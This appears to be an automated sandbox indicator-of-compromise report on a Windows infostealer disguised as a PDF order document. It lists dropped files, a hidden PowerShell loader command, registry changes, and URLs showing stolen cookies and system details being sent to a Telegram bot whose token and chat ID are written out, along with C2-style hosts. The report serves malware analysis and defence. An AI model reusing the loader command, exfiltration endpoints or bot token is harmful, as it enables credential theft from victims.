IOC Report
Order requirements CIF Greece_pdf.exe

loading gif

Files

File Path
Type
Category
Malicious
Order requirements CIF Greece_pdf.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch
ASCII text, with very long lines (4327), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5bj4afn.jkc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iimpnwhy.qhp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jecjibju.mtj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2bkz4ka.g2p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\frastdningens.hag
data
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\pelvetia.txt
ASCII text, with very long lines (319), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\sakkende.dro
data
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Hyldebrret2.faj
data
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Juicy.sla
data
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\Sitka.Afg
data
dropped
C:\Users\user\AppData\Roaming\skittaget\lektier\ekspertpanel.bro
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
https://translate.google.com/translate_a/element.js
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
http://crl.micros6
unknown
http://checkip.dyndns.org
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://reallyfreegeoip.org/xml/8.46.123.75
188.114.96.3
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
132.226.247.73
http://nsis.sf.net/NSIS_Error
unknown
http://crl.microl
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery
149.154.167.220
http://anotherarmy.dns.army:8081
unknown
https://reallyfreegeoip.org/xml/8.46.123.75$
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://reallyfreegeoip.org
unknown
https://apis.google.com
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://api.telegram.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://drive.usercontent.google.com/1
unknown
https://drive.usercontent.google.com/s
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.186.78
drive.usercontent.google.com
172.217.16.129
reallyfreegeoip.org
188.114.96.3
api.telegram.org
149.154.167.220
checkip.dyndns.com
132.226.247.73
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
142.250.186.78
drive.google.com
United States
149.154.167.220
api.telegram.org
United Kingdom
172.217.16.129
drive.usercontent.google.com
United States
188.114.96.3
reallyfreegeoip.org
European Union
132.226.247.73
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\omitis\Uninstall\basishavnenes
socialist
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System
DisableCMD
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9EB9000
direct allocation
page execute and read and write
malicious
21101000
trusted library allocation
page read and write
malicious
2120A000
trusted library allocation
page read and write
malicious
23200000
trusted library allocation
page read and write
616D000
trusted library allocation
page read and write
86A0000
heap
page read and write
98000
stack
page read and write
8D60000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
AF7000
heap
page read and write
24040000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
32EE000
stack
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
22169000
trusted library allocation
page read and write
C8A000
heap
page read and write
EC0000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
231B0000
heap
page read and write
7BC0000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
8B76000
heap
page read and write
23210000
trusted library allocation
page read and write
5A64000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
22382000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
CE8000
stack
page read and write
8750000
trusted library allocation
page read and write
221BD000
trusted library allocation
page read and write
21150000
trusted library allocation
page read and write
AF5000
heap
page read and write
23F00000
trusted library allocation
page read and write
3246000
heap
page read and write
221B9000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
76EE000
stack
page read and write
23F10000
trusted library allocation
page read and write
212E2000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
23172000
trusted library allocation
page read and write
20E00000
remote allocation
page read and write
20FCF000
stack
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
50ED000
stack
page read and write
A1A000
trusted library allocation
page execute and read and write
236BE000
stack
page read and write
78A6000
heap
page read and write
23200000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
233E6000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
72B0000
direct allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
F30000
trusted library allocation
page read and write
7270000
direct allocation
page read and write
212F0000
trusted library allocation
page read and write
CAC000
stack
page read and write
E80000
direct allocation
page read and write
23200000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
4B22000
trusted library allocation
page read and write
211B3000
trusted library allocation
page read and write
7C3B000
stack
page read and write
23200000
trusted library allocation
page read and write
815000
heap
page read and write
23180000
trusted library allocation
page read and write
23426000
heap
page read and write
23190000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
4B90000
heap
page readonly
24060000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20BCE000
stack
page read and write
20AB0000
heap
page read and write
24060000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
20C80000
trusted library allocation
page read and write
C45000
heap
page read and write
42B9000
remote allocation
page execute and read and write
22456000
trusted library allocation
page read and write
AA0000
heap
page read and write
236D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
3310000
trusted library section
page read and write
233D7000
trusted library allocation
page read and write
785000
unkown
page read and write
23200000
trusted library allocation
page read and write
212F5000
trusted library allocation
page read and write
20F27000
stack
page read and write
7BD000
unkown
page readonly
7FD000
trusted library allocation
page execute and read and write
20B0E000
stack
page read and write
23456000
heap
page read and write
EC0000
trusted library allocation
page read and write
233E4000
trusted library allocation
page read and write
EA7000
heap
page read and write
8770000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
C95000
heap
page read and write
23F10000
trusted library allocation
page execute and read and write
212B5000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
22253000
trusted library allocation
page read and write
78C2000
heap
page read and write
21506000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
20B8E000
stack
page read and write
23190000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
211BC000
trusted library allocation
page read and write
20E00000
remote allocation
page read and write
BDA000
heap
page read and write
CC0000
heap
page read and write
23EF0000
trusted library allocation
page read and write
2117A000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
23201000
trusted library allocation
page read and write
830000
heap
page read and write
236E0000
trusted library allocation
page read and write
6129000
trusted library allocation
page read and write
2367E000
stack
page read and write
23EF0000
trusted library allocation
page read and write
F01000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EED000
trusted library allocation
page read and write
211AF000
trusted library allocation
page read and write
408000
unkown
page readonly
772E000
stack
page read and write
EC0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
223EA000
trusted library allocation
page read and write
C4C000
heap
page read and write
236D0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
C37000
heap
page read and write
236D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
2313E000
stack
page read and write
236D0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
21299000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
22453000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
231A6000
trusted library allocation
page read and write
503E000
stack
page read and write
23210000
trusted library allocation
page read and write
20720000
direct allocation
page read and write
F10000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
7E8000
heap
page read and write
231A0000
trusted library allocation
page read and write
20700000
direct allocation
page read and write
24050000
trusted library allocation
page execute and read and write
236D0000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
233D0000
trusted library allocation
page read and write
20B4F000
stack
page read and write
4B1A000
trusted library allocation
page execute and read and write
22480000
trusted library allocation
page read and write
400000
unkown
page readonly
22293000
trusted library allocation
page read and write
59FC000
trusted library allocation
page read and write
4AE0000
trusted library allocation
page read and write
ED0000
trusted library allocation
page execute and read and write
A2B000
trusted library allocation
page execute and read and write
A10000
trusted library allocation
page read and write
7EF10000
trusted library allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
2315E000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
2246C000
trusted library allocation
page read and write
62B1000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
2237A000
trusted library allocation
page read and write
221D6000
trusted library allocation
page read and write
21169000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7A9000
unkown
page read and write
7440000
heap
page read and write
2243D000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
4B20000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
F80000
direct allocation
page read and write
865D000
stack
page read and write
221F2000
trusted library allocation
page read and write
2222E000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
4CB9000
remote allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
7220000
direct allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
24070000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7BD000
unkown
page readonly
23EF0000
trusted library allocation
page read and write
D20000
heap
page read and write
236C0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
4FCE000
stack
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20E00000
remote allocation
page read and write
206E0000
direct allocation
page read and write
93FB000
stack
page read and write
24020000
trusted library allocation
page execute and read and write
7320000
direct allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
50F9000
heap
page read and write
23F00000
trusted library allocation
page read and write
212E6000
trusted library allocation
page read and write
23146000
trusted library allocation
page read and write
22244000
trusted library allocation
page read and write
DA9000
heap
page read and write
236C0000
trusted library allocation
page read and write
7BB000
unkown
page read and write
231A0000
trusted library allocation
page read and write
223D0000
trusted library allocation
page read and write
24070000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
21167000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
EC4000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7A4E000
stack
page read and write
303E000
stack
page read and write
22479000
trusted library allocation
page read and write
2222C000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
22123000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
58B5000
trusted library allocation
page read and write
8A01000
heap
page read and write
23469000
heap
page read and write
F00000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20740000
direct allocation
page read and write
22386000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20730000
direct allocation
page read and write
72F0000
heap
page execute and read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
2221C000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
408000
unkown
page readonly
236D0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
787000
unkown
page read and write
5256000
trusted library allocation
page read and write
C5C000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23DDF000
stack
page read and write
240E0000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23E9E000
stack
page read and write
2A8F000
stack
page read and write
23200000
trusted library allocation
page read and write
71BD000
stack
page read and write
23200000
trusted library allocation
page read and write
23180000
trusted library allocation
page read and write
2115C000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
20FE0000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
7F0000
trusted library allocation
page read and write
CA4000
heap
page read and write
24030000
trusted library allocation
page execute and read and write
23200000
trusted library allocation
page read and write
20F6E000
stack
page read and write
24060000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
C1D000
heap
page read and write
EC0000
trusted library allocation
page read and write
7F3000
trusted library allocation
page execute and read and write
24070000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
30D0000
heap
page read and write
23CDE000
stack
page read and write
EC0000
trusted library allocation
page read and write
3327000
heap
page read and write
236C0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
22448000
trusted library allocation
page read and write
8B50000
heap
page read and write
AF7000
heap
page read and write
236D0000
trusted library allocation
page read and write
401000
unkown
page execute read
21590000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
D6E000
stack
page read and write
7210000
direct allocation
page read and write
2141B000
trusted library allocation
page read and write
C6F000
stack
page read and write
240D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
8E0000
heap
page read and write
4B10000
trusted library allocation
page read and write
869E000
stack
page read and write
233E0000
trusted library allocation
page read and write
EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
232C0000
heap
page read and write
240C0000
trusted library allocation
page read and write
E70000
direct allocation
page read and write
7B20000
trusted library allocation
page execute and read and write
236D0000
trusted library allocation
page read and write
22486000
trusted library allocation
page read and write
89D6000
heap
page read and write
222B4000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
7757000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
4BC7000
heap
page read and write
800000
heap
page read and write
23EF0000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
2249D000
trusted library allocation
page read and write
223B2000
trusted library allocation
page read and write
8BD2000
trusted library allocation
page read and write
223D2000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
A16000
trusted library allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
4F4E000
stack
page read and write
236D0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
59CC000
trusted library allocation
page read and write
DA5000
heap
page read and write
23200000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
A0D000
trusted library allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
24076000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
215BE000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
8DFE000
stack
page read and write
23EF0000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
22363000
trusted library allocation
page read and write
815000
heap
page read and write
24030000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
86B0000
trusted library allocation
page execute and read and write
3320000
heap
page read and write
23461000
heap
page read and write
213EB000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
7250000
direct allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
4AF3000
trusted library allocation
page execute and read and write
23200000
trusted library allocation
page read and write
7E0000
heap
page read and write
22396000
trusted library allocation
page read and write
23D1D000
stack
page read and write
23210000
trusted library allocation
page read and write
8A0D000
heap
page read and write
3224000
heap
page read and write
23210000
trusted library allocation
page read and write
211AB000
trusted library allocation
page read and write
CED000
stack
page read and write
23190000
trusted library allocation
page read and write
72A0000
direct allocation
page read and write
6109000
trusted library allocation
page read and write
211B7000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
210E0000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
9420000
direct allocation
page execute and read and write
89D0000
heap
page read and write
C83000
heap
page read and write
819000
heap
page read and write
20C0D000
stack
page read and write
A12000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
819000
heap
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20FF0000
heap
page execute and read and write
8960000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
4B40000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
7760000
heap
page execute and read and write
23EF0000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
2238E000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7792000
heap
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
50AE000
stack
page read and write
23200000
trusted library allocation
page read and write
20750000
direct allocation
page read and write
23400000
heap
page read and write
EF0000
trusted library allocation
page read and write
22388000
trusted library allocation
page read and write
F70000
direct allocation
page read and write
20CCE000
stack
page read and write
236C0000
trusted library allocation
page read and write
DA0000
heap
page read and write
2DD0000
heap
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
F90000
direct allocation
page read and write
236C0000
trusted library allocation
page read and write
7240000
direct allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
7A1000
unkown
page read and write
A25000
trusted library allocation
page execute and read and write
2137D000
trusted library allocation
page read and write
4B09000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
717E000
stack
page read and write
23200000
trusted library allocation
page read and write
211E7000
trusted library allocation
page read and write
7B0D000
stack
page read and write
236C0000
trusted library allocation
page read and write
4FD0000
trusted library allocation
page execute and read and write
8AB0000
heap
page read and write
AB0000
heap
page readonly
8E00000
trusted library allocation
page execute and read and write
22484000
trusted library allocation
page read and write
212B7000
trusted library allocation
page read and write
2316D000
trusted library allocation
page read and write
22423000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
88DE000
stack
page read and write
20F70000
trusted library allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
30C6000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
7280000
direct allocation
page read and write
2DE0000
heap
page read and write
21562000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
86F5000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
232C1000
heap
page read and write
515F000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
78AF000
heap
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
20C4C000
stack
page read and write
23200000
trusted library allocation
page read and write
2235D000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
22199000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
EE0000
trusted library allocation
page read and write
22373000
trusted library allocation
page read and write
221CF000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
233E0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
D0E000
stack
page read and write
211A3000
trusted library allocation
page read and write
32F0000
heap
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
56B9000
remote allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
72C0000
direct allocation
page read and write
223C0000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
212B9000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
4FE0000
trusted library allocation
page read and write
233C0000
trusted library allocation
page read and write
30C0000
heap
page read and write
212A4000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
85C4000
stack
page read and write
7A00000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
23E1E000
stack
page read and write
24060000
trusted library allocation
page read and write
5101000
trusted library allocation
page read and write
31DC000
heap
page read and write
23190000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
7A4000
unkown
page read and write
7FD000
heap
page read and write
23F00000
trusted library allocation
page read and write
4BA8000
trusted library allocation
page read and write
23140000
trusted library allocation
page read and write
20E90000
direct allocation
page read and write
955000
heap
page read and write
7EF28000
trusted library allocation
page execute and read and write
401000
unkown
page execute read
236D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8A33000
heap
page read and write
4AF4000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
62AB000
trusted library allocation
page read and write
713B000
stack
page read and write
23200000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
212E8000
trusted library allocation
page read and write
214D8000
trusted library allocation
page read and write
40A000
unkown
page write copy
930000
heap
page read and write
23210000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
224A5000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
20710000
direct allocation
page read and write
24030000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
94B9000
direct allocation
page execute and read and write
221E2000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
221EA000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
8A09000
heap
page read and write
4AFD000
trusted library allocation
page execute and read and write
23200000
trusted library allocation
page read and write
58AC000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
233EA000
trusted library allocation
page read and write
8775000
trusted library allocation
page read and write
23200000
